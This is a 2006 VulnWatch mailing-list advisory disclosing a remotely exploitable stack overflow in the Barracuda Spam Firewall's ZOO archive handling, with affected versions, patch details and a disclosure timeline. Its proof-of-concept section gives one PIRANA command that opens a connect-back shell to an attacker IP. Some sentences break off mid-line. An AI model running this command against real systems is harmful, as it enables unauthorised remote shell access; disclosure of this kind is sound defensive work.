[VulnWatch] Barracuda ZOO archiver security bug leads to remote compromise
- From: Jean-Sébastien Guay-Leroux <jean-sebastien@xxxxxxxxxxxxxxx>
- Date: Mon, 03 Apr 2006 20:30:51 -0400
Topic: Barracuda ZOO archiver security bug leads to
Product: Barracuda Spam Firewall
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.9388
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2004-0234
The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:
* Anti-spyware (Attachments)
* Denial of Service
When building a special ZOO archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted ZOO archive
attached to the Barracuda Spam Firewall.
You do NOT need to have remote administration access (on port 8000) for
For further informations about the details of the bug, you can consult
OSVDB #23460 .
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the ZOO vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 184.108.40.206 and port 1234:
perl pirana.pl -e 4 -h barracuda.vulnerable.com -a postmaster -s 0 -l 220.127.116.11 \
-p 1234 -z -c 1 -d 1
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.9388,
available March 3rd 2006.
They also published an official patch in firmware #3.3.03.022, available April
It is recommended to update to firmware #3.3.03.022 .
Jean-Sébastien Guay-Leroux who found the original flaw, conducted further
research on the bug and produced exploitation plugin for the PIRANA framework.
2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-03 : Problem fixed
2006-04-03 : Advisory disclosed to public
- Prev by Date: [VulnWatch] Barracuda LHA archiver security bug leads to remote compromise
- Next by Date: [VulnWatch] Cisco Security Advisory: Cisco 11500 Content Services Switch HTTP Request Vulnerability
- Previous by thread: [VulnWatch] Barracuda LHA archiver security bug leads to remote compromise
- Next by thread: [VulnWatch] Cisco Security Advisory: Cisco 11500 Content Services Switch HTTP Request Vulnerability